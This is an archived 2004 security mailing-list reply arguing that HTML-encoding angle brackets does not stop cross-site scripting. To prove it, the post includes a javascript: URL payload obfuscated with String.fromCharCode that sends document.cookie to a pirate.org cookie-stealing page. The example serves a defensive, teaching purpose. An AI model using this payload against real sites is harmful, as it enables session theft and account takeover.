WebApp Sec mailing list archives
Re: [Re: AppSec FAQ at OWASP]
From: "Philippe Prados" <pprados () club-internet fr>
Date: Fri, 30 Jan 2004 08:51:33 +0100
In-Reply-To: <310iaCqnW6720S13.1075394388 () uwdvg013 cms usa net> An easier solution to prevent XSS attacks might be to HTML encode the "<"
and ">" characters as < and >. So even if they are accepted as input from the user, it would not result in the execution of a script like <script>...</script>.
No. It's not correct. With this code : <a href="<%= escapeHTML(url)%>/doc.html">Document</a> The hacker can inject in the variable url the value : javascript:eval(String.fromCharCode(60,115,99,114,105,112,116,62,110,101,119 ,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,112 ,105,114,97,116,101,46,111,114,103,47,118,111,108,101,99,111,111,107,105,101 ,46,106,115,112,63,99,61,34,43,101,115,99,97,112,101,40,100,111,99,117,109,1 01,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62)) and execute a script without <, > or &! Phil
Current thread:
- Re: [Re: AppSec FAQ at OWASP] Sangita Pakala (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Omar Ismail (Jan 29)
- <Possible follow-ups>
- Re: [Re: AppSec FAQ at OWASP] Rohyt Belani (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Philippe P. (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Philippe Prados (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Ulf Härnhammar (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Omarjan Ismail (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Rohyt Belani (Jan 30)